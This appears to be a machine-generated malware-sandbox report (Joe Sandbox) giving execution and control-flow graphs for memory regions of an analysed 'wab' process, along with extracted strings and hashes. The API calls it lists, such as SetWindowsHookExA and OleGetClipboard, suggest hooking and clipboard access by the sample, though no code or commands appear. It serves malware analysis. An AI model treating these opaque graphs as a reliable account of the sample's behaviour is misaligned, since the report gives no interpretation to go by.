                                                                          execution_graph 34254 233c7318 DuplicateHandle 34255 233c73ae 34254->34255 34357 a4d030 34358 a4d048 34357->34358 34359 a4d0a2 34358->34359 34367 233c276c 34358->34367 34375 233c7ef2 34358->34375 34383 233c39b0 34358->34383 34392 233c7f10 34358->34392 34400 233c387a 34358->34400 34406 233c3888 34358->34406 34412 233c275c 34358->34412 34368 233c2777 34367->34368 34369 233c7f81 34368->34369 34371 233c7f71 34368->34371 34428 233c6e9c 34369->34428 34416 233c80a8 34371->34416 34422 233c8098 34371->34422 34372 233c7f7f 34376 233c7f00 34375->34376 34376->34359 34377 233c7f81 34376->34377 34379 233c7f71 34376->34379 34378 233c6e9c 2 API calls 34377->34378 34380 233c7f7f 34378->34380 34381 233c80a8 2 API calls 34379->34381 34382 233c8098 2 API calls 34379->34382 34381->34380 34382->34380 34384 233c39c0 34383->34384 34385 233c39e2 34383->34385 34499 233c2794 34384->34499 34388 233c0b8c GetModuleHandleW 34385->34388 34387 233c39c7 34387->34359 34389 233c3a29 34388->34389 34390 233c0b9c GetModuleHandleW 34389->34390 34391 233c3a97 34389->34391 34390->34391 34393 233c7f22 34392->34393 34394 233c7f81 34393->34394 34396 233c7f71 34393->34396 34395 233c6e9c 2 API calls 34394->34395 34397 233c7f7f 34395->34397 34398 233c80a8 2 API calls 34396->34398 34399 233c8098 2 API calls 34396->34399 34398->34397 34399->34397 34401 233c38ae 34400->34401 34402 233c275c GetModuleHandleW 34401->34402 34403 233c38ba 34402->34403 34404 233c276c 2 API calls 34403->34404 34405 233c38cf 34404->34405 34405->34359 34407 233c38ae 34406->34407 34408 233c275c GetModuleHandleW 34407->34408 34409 233c38ba 34408->34409 34410 233c276c 2 API calls 34409->34410 34411 233c38cf 34410->34411 34411->34359 34413 233c2767 34412->34413 34414 233c2794 GetModuleHandleW 34413->34414 34415 233c39c7 34414->34415 34415->34359 34418 233c80b6 34416->34418 34417 233c6e9c 2 API calls 34417->34418 34418->34417 34419 233c8192 34418->34419 34435 233c8579 34418->34435 34441 233c8588 34418->34441 34419->34372 34423 233c80a8 34422->34423 34424 233c6e9c 2 API calls 34423->34424 34425 233c8192 34423->34425 34426 233c8588 OleGetClipboard 34423->34426 34427 233c8579 OleGetClipboard 34423->34427 34424->34423 34425->34372 34426->34423 34427->34423 34429 233c6ea7 34428->34429 34430 233c81ea 34429->34430 34431 233c8294 34429->34431 34432 233c8242 CallWindowProcW 34430->34432 34434 233c81f1 34430->34434 34433 233c276c OleGetClipboard 34431->34433 34432->34434 34433->34434 34434->34372 34436 233c85a7 34435->34436 34437 233c85ac 34436->34437 34447 233c8acf 34436->34447 34453 233c8b40 34436->34453 34459 233c8b30 34436->34459 34437->34418 34442 233c85a7 34441->34442 34443 233c85ac 34442->34443 34444 233c8acf OleGetClipboard 34442->34444 34445 233c8b30 OleGetClipboard 34442->34445 34446 233c8b40 OleGetClipboard 34442->34446 34443->34418 34444->34442 34445->34442 34446->34442 34448 233c8ad4 34447->34448 34449 233c8b5b 34448->34449 34465 233c8b88 34448->34465 34476 233c8b7a 34448->34476 34449->34436 34450 233c8b71 34450->34436 34455 233c8b48 34453->34455 34454 233c8b5c 34454->34436 34455->34454 34457 233c8b88 OleGetClipboard 34455->34457 34458 233c8b7a OleGetClipboard 34455->34458 34456 233c8b71 34456->34436 34457->34456 34458->34456 34461 233c8b48 34459->34461 34460 233c8b5c 34460->34436 34461->34460 34463 233c8b88 OleGetClipboard 34461->34463 34464 233c8b7a OleGetClipboard 34461->34464 34462 233c8b71 34462->34436 34463->34462 34464->34462 34466 233c8b9a 34465->34466 34467 233c8bb5 34466->34467 34473 233c8bf9 34466->34473 34474 233c8b88 OleGetClipboard 34467->34474 34475 233c8b7a OleGetClipboard 34467->34475 34468 233c8bbb 34468->34450 34469 233c8c97 34469->34450 34470 233c8c79 34470->34450 34473->34470 34487 233c8e50 34473->34487 34491 233c8e40 34473->34491 34474->34468 34475->34468 34477 233c8b9a 34476->34477 34478 233c8bb5 34477->34478 34480 233c8bf9 34477->34480 34483 233c8b88 OleGetClipboard 34478->34483 34484 233c8b7a OleGetClipboard 34478->34484 34479 233c8bbb 34479->34450 34482 233c8c79 34480->34482 34485 233c8e50 OleGetClipboard 34480->34485 34486 233c8e40 OleGetClipboard 34480->34486 34481 233c8c97 34481->34450 34482->34450 34483->34479 34484->34479 34485->34481 34486->34481 34489 233c8e65 34487->34489 34490 233c8e8b 34489->34490 34495 233c88b8 34489->34495 34490->34469 34493 233c8e65 34491->34493 34492 233c88b8 OleGetClipboard 34492->34493 34493->34492 34494 233c8e8b 34493->34494 34494->34469 34496 233c8ef8 OleGetClipboard 34495->34496 34498 233c8f92 34496->34498 34500 233c279f 34499->34500 34501 233c0b8c GetModuleHandleW 34500->34501 34502 233c3a29 34501->34502 34503 233c0b9c GetModuleHandleW 34502->34503 34504 233c3a97 34502->34504 34503->34504 34505 233ca8e8 34507 233ca92c SetWindowsHookExA 34505->34507 34508 233ca972 34507->34508 34509 233c220a 34510 233c2258 GetModuleHandleW 34509->34510 34511 233c2252 34509->34511 34512 233c2285 34510->34512 34511->34510 34256 233c36d0 34257 233c36dc CreateWindowExW 34256->34257 34259 233c37f4 34257->34259 34513 233c8d60 34514 233c8d6b 34513->34514 34516 233c8d7b 34514->34516 34517 233c87a0 34514->34517 34518 233c8db0 OleInitialize 34517->34518 34519 233c8e14 34518->34519 34519->34516 34260 a70848 34262 a7084e 34260->34262 34261 a7091b 34262->34261 34264 a71380 34262->34264 34266 a71396 34264->34266 34265 a714aa 34265->34262 34266->34265 34269 233c0618 34266->34269 34277 233c0608 34266->34277 34270 233c062a 34269->34270 34271 233c06db 34270->34271 34285 233c0424 34270->34285 34294 233c0454 GetModuleHandleW 34271->34294 34274 233c06ee 34274->34266 34275 233c06a1 34290 233c0444 34275->34290 34278 233c062a 34277->34278 34279 233c06db 34278->34279 34280 233c0424 GetModuleHandleW 34278->34280 34356 233c0454 GetModuleHandleW 34279->34356 34282 233c06a1 34280->34282 34284 233c0444 KiUserCallbackDispatcher 34282->34284 34283 233c06ee 34283->34266 34284->34279 34286 233c042f 34285->34286 34295 233c17d8 34286->34295 34307 233c17c3 34286->34307 34287 233c087a 34287->34275 34292 233c044f 34290->34292 34293 233c84d3 34292->34293 34352 233c6ef4 34292->34352 34293->34271 34294->34274 34296 233c1803 34295->34296 34319 233c0b8c 34296->34319 34299 233c1886 34301 233c18b2 34299->34301 34340 233c0b9c 34299->34340 34302 233c0b8c GetModuleHandleW 34302->34299 34310 233c17d8 34307->34310 34308 233c0b8c GetModuleHandleW 34309 233c186a 34308->34309 34314 233c0b8c GetModuleHandleW 34309->34314 34315 233c1d30 GetModuleHandleW 34309->34315 34316 233c1d60 GetModuleHandleW 34309->34316 34317 233c1d51 GetModuleHandleW 34309->34317 34318 233c1cb1 GetModuleHandleW 34309->34318 34310->34308 34311 233c1886 34312 233c0b9c GetModuleHandleW 34311->34312 34313 233c18b2 34311->34313 34312->34313 34314->34311 34315->34311 34316->34311 34317->34311 34318->34311 34321 233c0b97 34319->34321 34320 233c186a 34320->34302 34323 233c1d30 34320->34323 34328 233c1d60 34320->34328 34332 233c1d51 34320->34332 34336 233c1cb1 34320->34336 34321->34320 34344 233c1f2f 34321->34344 34324 233c1d40 34323->34324 34325 233c1d62 34323->34325 34324->34299 34326 233c1e0e 34325->34326 34327 233c1f2f GetModuleHandleW 34325->34327 34327->34326 34329 233c1d8d 34328->34329 34330 233c1e0e 34329->34330 34331 233c1f2f GetModuleHandleW 34329->34331 34331->34330 34334 233c1d62 34332->34334 34333 233c1e0e 34334->34333 34335 233c1f2f GetModuleHandleW 34334->34335 34335->34333 34337 233c1cc0 34336->34337 34338 233c1c68 34337->34338 34339 233c1f2f GetModuleHandleW 34337->34339 34338->34299 34339->34338 34341 233c2210 GetModuleHandleW 34340->34341 34343 233c2285 34341->34343 34343->34301 34345 233c1f3a 34344->34345 34346 233c0b9c GetModuleHandleW 34345->34346 34347 233c205a 34346->34347 34348 233c0b9c GetModuleHandleW 34347->34348 34349 233c20d4 34347->34349 34350 233c20a8 34348->34350 34349->34320 34350->34349 34351 233c0b9c GetModuleHandleW 34350->34351 34351->34349 34353 233c84e8 KiUserCallbackDispatcher 34352->34353 34355 233c8556 34353->34355 34355->34292 34356->34283

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 233d30a0-233d30c2 2 233d30c3-233d30c6 0->2 3 233d30c9-233d30eb 2->3 4 233d3867-233d386a 2->4 13 233d30ed-233d30f0 3->13 14 233d3104-233d310e 3->14 5 233d386c-233d388b 4->5 6 233d3890-233d3892 4->6 5->6 8 233d3899-233d389c 6->8 9 233d3894 6->9 8->2 11 233d38a2-233d38ab 8->11 9->8 13->14 16 233d30f2-233d3102 13->16 19 233d3114-233d3123 14->19 16->19 127 233d3125 call 233d38b8 19->127 128 233d3125 call 233d38c0 19->128 20 233d312a-233d312f 21 233d313c-233d3419 20->21 22 233d3131-233d3137 20->22 43 233d341f-233d34ce 21->43 44 233d3859-233d3866 21->44 22->11 53 233d34f7 43->53 54 233d34d0-233d34f5 43->54 56 233d3500-233d3513 53->56 54->56 58 233d3519-233d353b 56->58 59 233d3840-233d384c 56->59 58->59 62 233d3541-233d354b 58->62 59->43 60 233d3852 59->60 60->44 62->59 63 233d3551-233d355c 62->63 63->59 64 233d3562-233d3638 63->64 76 233d363a-233d363c 64->76 77 233d3646-233d3676 64->77 76->77 81 233d3678-233d367a 77->81 82 233d3684-233d3690 77->82 81->82 83 233d36f0-233d36f4 82->83 84 233d3692-233d3696 82->84 85 233d36fa-233d3736 83->85 86 233d3831-233d383a 83->86 84->83 87 233d3698-233d36c2 84->87 97 233d3738-233d373a 85->97 98 233d3744-233d3752 85->98 86->59 86->64 94 233d36c4-233d36c6 87->94 95 233d36d0-233d36ed 87->95 94->95 95->83 97->98 101 233d3769-233d3774 98->101 102 233d3754-233d375f 98->102 106 233d378c-233d379d 101->106 107 233d3776-233d377c 101->107 102->101 105 233d3761 102->105 105->101 111 233d379f-233d37a5 106->111 112 233d37b5-233d37c1 106->112 108 233d377e 107->108 109 233d3780-233d3782 107->109 108->106 109->106 113 233d37a9-233d37ab 111->113 114 233d37a7 111->114 116 233d37d9-233d382a 112->116 117 233d37c3-233d37c9 112->117 113->112 114->112 116->86 118 233d37cd-233d37cf 117->118 119 233d37cb 117->119 118->116 119->116 127->20 128->20
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: <:z"$$qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-3744192722
                                                                          • Opcode ID: af05c524246ea2f8914739f649f282a33b434f4ca212ccda1b5838540470be88
                                                                          • Instruction ID: 64c316130e8f742501ff58add8ad51e95df313d50e4fbe7a78fa87046124c62e
                                                                          • Opcode Fuzzy Hash: af05c524246ea2f8914739f649f282a33b434f4ca212ccda1b5838540470be88
                                                                          • Instruction Fuzzy Hash: 49324E71E1061A8BCB14EF75C89059DF7B2BFC9311F51C6A9D409AB214EB34EE85CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ('z"$('z"$I[
                                                                          • API String ID: 0-2551913501
                                                                          • Opcode ID: 7510fb68c830cc1081f4734b9f2c26bbf1a66c1f05553daeba1071e2ca3e28d9
                                                                          • Instruction ID: c3227e179a11d1d8fb747b07949bad2fb89e253fe174727ebd9b79911cba9e1c
                                                                          • Opcode Fuzzy Hash: 7510fb68c830cc1081f4734b9f2c26bbf1a66c1f05553daeba1071e2ca3e28d9
                                                                          • Instruction Fuzzy Hash: C362A276B002188FDB04DB68C990B9DB7F6EF88311F5488A9E416DB355DB35EE45CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ('z"$<:z"
                                                                          • API String ID: 0-2300512769
                                                                          • Opcode ID: f9b3768ec5ea7b9c20d96169d1e6d677641dedf5996a4a37f795c65ee8c37bb6
                                                                          • Instruction ID: 1411e2471be6b5ab66651ab26b6a53643e4455b4286f1827552f0886f8712774
                                                                          • Opcode Fuzzy Hash: f9b3768ec5ea7b9c20d96169d1e6d677641dedf5996a4a37f795c65ee8c37bb6
                                                                          • Instruction Fuzzy Hash: 26924836A002088FCB14DF68C984B4DB7F2FB45311F5984A9E45ADB366DB75EE85CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1251 a7ef10-a7ef1e 1252 a7ef42-a7ef61 call a778ec 1251->1252 1253 a7ef20-a7ef32 1251->1253 1261 a7ef66-a7ef73 1252->1261 1254 a7ef96-a7ef9d 1253->1254 1255 a7ef34-a7ef40 1253->1255 1255->1252 1263 a7ef75-a7ef8e 1261->1263 1264 a7ef9e-a7f005 1261->1264 1263->1254 1274 a7f007-a7f009 1264->1274 1275 a7f00e-a7f01e 1264->1275 1276 a7f2ad-a7f2b4 1274->1276 1277 a7f025-a7f035 1275->1277 1278 a7f020 1275->1278 1280 a7f294-a7f2a2 1277->1280 1281 a7f03b-a7f049 1277->1281 1278->1276 1284 a7f2b5-a7f32e 1280->1284 1286 a7f2a4-a7f2a8 call a77b80 1280->1286 1281->1284 1285 a7f04f 1281->1285 1285->1284 1287 a7f247-a7f262 call a70350 1285->1287 1288 a7f106-a7f127 1285->1288 1289 a7f264-a7f286 1285->1289 1290 a7f0e0-a7f101 1285->1290 1291 a7f1ee-a7f214 1285->1291 1292 a7f06d-a7f08e 1285->1292 1293 a7f12c-a7f14d 1285->1293 1294 a7f1ac-a7f1e9 1285->1294 1295 a7f288-a7f292 1285->1295 1296 a7f056-a7f068 1285->1296 1297 a7f093-a7f0b5 1285->1297 1298 a7f152-a7f17a 1285->1298 1299 a7f17f-a7f1a7 1285->1299 1300 a7f0ba-a7f0db 1285->1300 1301 a7f219-a7f245 1285->1301 1286->1276 1287->1276 1288->1276 1289->1276 1290->1276 1291->1276 1292->1276 1293->1276 1294->1276 1295->1276 1296->1276 1297->1276 1298->1276 1299->1276 1300->1276 1301->1276
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Xuq$$qq
                                                                          • API String ID: 0-2219112740
                                                                          • Opcode ID: 5ed54d4c8e369b2df84aeb8ef54f2d5d9e3104f35e462572d07e0f20961ed8bf
                                                                          • Instruction ID: 50517c81cfb1f81fd25541767f6748e11da7da0891c8010cba897be978c1c311
                                                                          • Opcode Fuzzy Hash: 5ed54d4c8e369b2df84aeb8ef54f2d5d9e3104f35e462572d07e0f20961ed8bf
                                                                          • Instruction Fuzzy Hash: 31B19134B042188FCB18DBB5985467E7BB7BFC8701B15C96AD406DB399DE34CD028792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 17fffbec848663ef0954d0fa2589f22aafc4dddab48ad041f63c841b0db82782
                                                                          • Instruction ID: 8b46a6b6503fce8cce735123c48c65047cdacb76878879cb9270adc6c6a7a0a0
                                                                          • Opcode Fuzzy Hash: 17fffbec848663ef0954d0fa2589f22aafc4dddab48ad041f63c841b0db82782
                                                                          • Instruction Fuzzy Hash: 5853F731D10B1A8ADB11EF68C890699F7B1FF99310F51C79AE4587B121FB70AAC5CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2876 233d51e0-233d51fd 2877 233d51ff-233d5202 2876->2877 2879 233d5218-233d521b 2877->2879 2880 233d5204-233d5213 2877->2880 2881 233d521d-233d5224 2879->2881 2882 233d5229-233d522c 2879->2882 2880->2879 2881->2882 2883 233d523d-233d5240 2882->2883 2884 233d522e-233d5232 2882->2884 2888 233d5253-233d5256 2883->2888 2889 233d5242-233d5248 2883->2889 2886 233d539e-233d53ab 2884->2886 2887 233d5238 2884->2887 2887->2883 2892 233d5258-233d525e 2888->2892 2893 233d5265-233d5268 2888->2893 2890 233d532c-233d5332 2889->2890 2891 233d524e 2889->2891 2894 233d53ac-233d53c6 2890->2894 2895 233d5334-233d533c 2890->2895 2891->2888 2896 233d5284-233d528e 2892->2896 2897 233d5260 2892->2897 2898 233d526a-233d526b 2893->2898 2899 233d5270-233d5273 2893->2899 2908 233d53c8-233d53db 2894->2908 2909 233d53ea-233d53f1 2894->2909 2895->2894 2900 233d533e-233d534b 2895->2900 2906 233d5295-233d5297 2896->2906 2897->2893 2898->2899 2901 233d527f-233d5282 2899->2901 2902 233d5275-233d527e 2899->2902 2900->2894 2904 233d534d-233d5351 2900->2904 2901->2896 2905 233d529c-233d529f 2901->2905 2910 233d5356-233d5359 2904->2910 2905->2889 2907 233d52a1-233d52a4 2905->2907 2906->2905 2907->2892 2911 233d52a6-233d52a9 2907->2911 2916 233d53e5-233d53e8 2908->2916 2912 233d535b-233d535d 2910->2912 2913 233d5360-233d5363 2910->2913 2914 233d52bc-233d52bf 2911->2914 2915 233d52ab-233d52b1 2911->2915 2912->2913 2917 233d537f-233d5382 2913->2917 2918 233d5365-233d537a 2913->2918 2922 233d52c1-233d52de 2914->2922 2923 233d52e3-233d52e6 2914->2923 2920 233d5384-233d5387 2915->2920 2921 233d52b7 2915->2921 2916->2909 2924 233d53f2-233d53f5 2916->2924 2919 233d538c-233d538e 2917->2919 2917->2920 2918->2917 2925 233d5395-233d5398 2919->2925 2926 233d5390 2919->2926 2920->2919 2921->2914 2922->2923 2927 233d52e8-233d52eb 2923->2927 2928 233d52f0-233d52f3 2923->2928 2929 233d5417-233d541a 2924->2929 2930 233d53f7-233d53fb 2924->2930 2925->2877 2925->2886 2926->2925 2927->2928 2935 233d52f5-233d530b 2928->2935 2936 233d5310-233d5313 2928->2936 2932 233d541c-233d5423 2929->2932 2933 233d542e-233d5431 2929->2933 2937 233d54ce-233d550c 2930->2937 2938 233d5401-233d5409 2930->2938 2942 233d5429 2932->2942 2943 233d54c6-233d54cd 2932->2943 2944 233d5433-233d543d 2933->2944 2945 233d5442-233d5445 2933->2945 2935->2936 2940 233d5315-233d5322 2936->2940 2941 233d5327-233d532a 2936->2941 2955 233d550e-233d5511 2937->2955 2938->2937 2939 233d540f-233d5412 2938->2939 2939->2929 2940->2941 2941->2890 2941->2910 2942->2933 2944->2945 2947 233d545d-233d5460 2945->2947 2948 233d5447-233d5458 2945->2948 2953 233d547a-233d547d 2947->2953 2954 233d5462-233d5466 2947->2954 2948->2947 2958 233d547f-233d5483 2953->2958 2959 233d5497-233d549a 2953->2959 2954->2937 2961 233d5468-233d5470 2954->2961 2956 233d551f-233d5522 2955->2956 2957 233d5513-233d551a 2955->2957 2962 233d553a-233d553d 2956->2962 2963 233d5524-233d5537 2956->2963 2957->2956 2958->2937 2964 233d5485-233d548d 2958->2964 2965 233d549c-233d54a0 2959->2965 2966 233d54b4-233d54b6 2959->2966 2961->2937 2967 233d5472-233d5475 2961->2967 2969 233d55ca-233d575e 2962->2969 2970 233d5543-233d5546 2962->2970 2964->2937 2968 233d548f-233d5492 2964->2968 2965->2937 2971 233d54a2-233d54aa 2965->2971 2972 233d54bd-233d54c0 2966->2972 2973 233d54b8 2966->2973 2967->2953 2968->2959 3027 233d5894-233d58a7 2969->3027 3028 233d5764-233d576b 2969->3028 2975 233d5548-233d5559 2970->2975 2976 233d5560-233d5563 2970->2976 2971->2937 2977 233d54ac-233d54af 2971->2977 2972->2916 2972->2943 2973->2972 2975->2963 2986 233d555b 2975->2986 2978 233d557d-233d5580 2976->2978 2979 233d5565-233d5576 2976->2979 2977->2966 2981 233d558a-233d558d 2978->2981 2982 233d5582-233d5587 2978->2982 2979->2957 2990 233d5578 2979->2990 2984 233d558f-233d5596 2981->2984 2985 233d559b-233d559e 2981->2985 2982->2981 2984->2985 2985->2969 2989 233d55a0-233d55a3 2985->2989 2986->2976 2992 233d55a5-233d55b6 2989->2992 2993 233d55c1-233d55c4 2989->2993 2990->2978 2992->2957 2999 233d55bc 2992->2999 2993->2969 2994 233d58aa-233d58ad 2993->2994 2997 233d58af-233d58c0 2994->2997 2998 233d58cb-233d58ce 2994->2998 2997->2957 3007 233d58c6 2997->3007 3000 233d58ec-233d58ee 2998->3000 3001 233d58d0-233d58e1 2998->3001 2999->2993 3002 233d58f5-233d58f8 3000->3002 3003 233d58f0 3000->3003 3001->2979 3009 233d58e7 3001->3009 3002->2955 3006 233d58fe-233d5907 3002->3006 3003->3002 3007->2998 3009->3000 3029 233d581f-233d5826 3028->3029 3030 233d5771-233d5794 3028->3030 3029->3027 3031 233d5828-233d585b 3029->3031 3039 233d579c-233d57a4 3030->3039 3043 233d585d 3031->3043 3044 233d5860-233d588d 3031->3044 3040 233d57a9-233d57ea 3039->3040 3041 233d57a6 3039->3041 3052 233d57ec-233d57fd 3040->3052 3053 233d5802-233d5813 3040->3053 3041->3040 3043->3044 3044->3006 3052->3006 3053->3006
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $
                                                                          • API String ID: 0-3993045852
                                                                          • Opcode ID: 5916505df84af8b1273d716b7213490f9040b2f9d065f2b43ab0101c9eceaa4e
                                                                          • Instruction ID: 3caefe18db92dabcd68f5fc60088dd11fff61562d9fd34de3740e5eb49d9d5df
                                                                          • Opcode Fuzzy Hash: 5916505df84af8b1273d716b7213490f9040b2f9d065f2b43ab0101c9eceaa4e
                                                                          • Instruction Fuzzy Hash: D722D273E042198FEB11EBA4C98069EBBB6FF85310F2484A9E405EB355DB35DE45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: I[
                                                                          • API String ID: 0-909448046
                                                                          • Opcode ID: 56c390c0e985bee541a07fc54bb6421a5522e924094e1a8897e61d5b99691825
                                                                          • Instruction ID: 866087b1101a13a7cf222a829145aa5ef10213079ff0f0c4cd9aa7b67724fe8a
                                                                          • Opcode Fuzzy Hash: 56c390c0e985bee541a07fc54bb6421a5522e924094e1a8897e61d5b99691825
                                                                          • Instruction Fuzzy Hash: 92227176E0020D8FDB14DB68C9807DEB7F6EB49311F2884A5E459DB352DB38DE818B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: |
                                                                          • API String ID: 0-2343686810
                                                                          • Opcode ID: fa8580a9ceb3dac0c0c8866e1a4c06c9b783ae9f3b070b90ffe80f5748ef1bee
                                                                          • Instruction ID: 13dbf020287297141e93ca7ef522bf5be333f973376d56606ea8ac25eb1f3347
                                                                          • Opcode Fuzzy Hash: fa8580a9ceb3dac0c0c8866e1a4c06c9b783ae9f3b070b90ffe80f5748ef1bee
                                                                          • Instruction Fuzzy Hash: 11B19F71B002159FDB14DF68C980B6EB7F6AB88310F25C5A9E819DB2A5DB34EC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7dec986a5e34f5b5ad2fd8d256a6d70179bbaa8e7979e186801d5c043271820b
                                                                          • Instruction ID: 8f04bd6450af1208d702d2792dfceea95bfb090e84bf102d8e33b2c3e2fe7833
                                                                          • Opcode Fuzzy Hash: 7dec986a5e34f5b5ad2fd8d256a6d70179bbaa8e7979e186801d5c043271820b
                                                                          • Instruction Fuzzy Hash: 7DB15C70E00209CFDB24CFA9DD8579EBBF2AF88354F14C529D459EB294EB749845CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86a59c5812f73fd16d704d69ac340e5d340043eeb71a9089ab00969df8358941
                                                                          • Instruction ID: e998306f6b270aceaef907237339896d5299eca18b0b00034f3c2813de766de2
                                                                          • Opcode Fuzzy Hash: 86a59c5812f73fd16d704d69ac340e5d340043eeb71a9089ab00969df8358941
                                                                          • Instruction Fuzzy Hash: 15916A71E00209DFDF14DFA9CD8579EBBF2AF88344F14C129E419AB294DB749985CB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 402 233d47a8-233d47cc 404 233d47ce-233d47d1 402->404 405 233d47d3-233d47ed 404->405 406 233d47f2-233d47f5 404->406 405->406 407 233d47fb-233d48f3 406->407 408 233d4ed4-233d4ed6 406->408 426 233d48f9-233d4946 call 233d5051 407->426 427 233d4976-233d497d 407->427 410 233d4edd-233d4ee0 408->410 411 233d4ed8 408->411 410->404 412 233d4ee6-233d4ef3 410->412 411->410 440 233d494c-233d4968 426->440 428 233d4a01-233d4a0a 427->428 429 233d4983-233d49f3 427->429 428->412 446 233d49fe 429->446 447 233d49f5 429->447 443 233d496a 440->443 444 233d4973 440->444 443->444 444->427 446->428 447->446
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: fvq$XPvq$\Ovq
                                                                          • API String ID: 0-1140148533
                                                                          • Opcode ID: 795954637d4a155043542d99d89f168aae861b2c0abb2e9ef0f87b01a54238b9
                                                                          • Instruction ID: d2809816595a259df9585bceeca33da04072af8f442fe3f9073208266d69e805
                                                                          • Opcode Fuzzy Hash: 795954637d4a155043542d99d89f168aae861b2c0abb2e9ef0f87b01a54238b9
                                                                          • Instruction Fuzzy Hash: CF618D32B042089FDB149FA5C954BAEBAF6EF88310F208469E506EB395DF758D418B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
